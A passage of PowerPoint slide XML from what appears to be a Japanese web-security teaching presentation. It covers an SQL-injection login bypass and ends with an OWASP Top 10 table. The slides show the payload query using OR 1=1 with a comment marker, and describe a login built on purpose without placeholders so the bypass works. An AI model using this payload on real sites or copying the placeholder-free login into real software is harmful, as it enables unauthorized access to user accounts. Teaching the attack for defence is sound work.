            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>と入力すると</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
              <a:t>SELECT * FROM user WHERE id=‘1’ OR 1=1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--’ AND pass=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>パスワード</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>となり、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>100%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>条件が一致するため結果を格納する配列に全ユーザが格納されログインに成功する。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="直線コネクタ 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A200BBD5-45A7-891D-19EE-55831F4DBB96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7480929" y="5271715"/>
            <a:ext cx="363499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021F53F0-DCEA-3936-5724-DAB957065F3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7480929" y="5303286"/>
            <a:ext cx="3647152" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>コメントアウトとなり無効になる</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="テキスト ボックス 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B89DF798-5A36-AB80-A862-3EC82DA25F54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7942125" y="4357315"/>
            <a:ext cx="2712602" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>がここで終了になる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="コネクタ: カギ線 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{428B4844-1D1B-AF2E-24C3-0DAA79C073CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7290487" y="4541981"/>
            <a:ext cx="651639" cy="477600"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9880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F1320A06-8C7D-297F-9F3D-8E7A304E3227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6607535" y="3976981"/>
            <a:ext cx="1334591" cy="565001"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 994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845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7EF94F-7CC8-BE92-A7EA-55626C3FB4CB}"/>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DD10A593-D6FE-94E7-ACD9-8DC8ACF44054}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正ログイン</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の対策で作成したログインから掲示板に行くプログラムに対してログイン画面のプログラムを一部書き換えて不正ログインを行う。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2030936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271E01-60FF-7125-A793-7C5BDE3184B4}"/>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8004FE01-5FC6-4553-8530-B7316A9EF109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正ログイン</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>データベース接続・ライブラリ</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C83F776-AAA3-BDA1-8CB5-54E18DF95579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3508796" y="2796621"/>
            <a:ext cx="5174408" cy="3775132"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100935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9D3DD-4B2B-4C73-13AE-92644E8A86A3}"/>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1540BBE2-B400-13CE-A0C3-B7D251C79BF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正ログイン</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ログイン認証→プレースホルダを使わない</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{661AB91F-18AB-3948-B8CA-A8C495B65C9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1832775" y="2806440"/>
            <a:ext cx="8526449" cy="3857725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2832170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827423-33FC-7FC4-0683-6BABE963D0AA}"/>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E225F5D3-96F4-4B55-99A1-7D0863A12466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正ログイン</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>掲示板表示画面と実行コード</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8357758C-7B44-4759-0A0C-9C688058BF74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3335679" y="2774207"/>
            <a:ext cx="5520642" cy="3892620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1590488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AF9088-EFF4-FE47-2696-F35988AA4A08}"/>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DBFF284A-A830-4C1F-9E36-0155AD9D6F7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正ログイン</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>今回は不正ログインできるようにすることが目的であるため入力必須にせず、メールアドレス入力欄のタイプは</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>にする。</a:t>
            </a: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3E2A554C-A959-228E-ABF4-30F9203AA6C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3429000"/>
            <a:ext cx="10515600" cy="2091857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="テキスト ボックス 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47CFD751-8BB5-4E43-FB6D-6C0B43DA283E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048663" y="5520857"/>
            <a:ext cx="6094674" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>login_SQLinjection.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2968229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F161D6-1A5F-C882-2A17-2EC9184F0C7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>における不正アクセスの被害</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17C75AB1-8C81-51BF-2CDB-13E423FE2C67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サイバー犯罪の被害ランキング</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="テキスト ボックス 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8285586B-6D3E-B717-1962-42D40F63B5B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="6375160"/>
            <a:ext cx="6094674" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>出典：https://owasp.org/Top10/ja/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="表 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA31EF7-64F0-C55B-62FA-9C7B0F8260B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3389617099"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3291398" y="2295920"/>
          <a:ext cx="5609204" cy="4079240"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="854697">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2774248720"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4754507">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1223688094"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>順位</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>原因</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3839867762"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>位</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>アクセス制御の不備</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="327498744"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>位</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>暗号化の失敗</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="86474352"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>位</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" b="0" dirty="0"/>
                        <a:t>インジェクション</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4241333656"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
                        <a:t>4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>位</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>安全が確認されていない不完全な設計</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2941779157"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
                        <a:t>5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>位</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>セキュリティの設定ミス</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2862080783"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
                        <a:t>6</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
                        <a:t>位</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
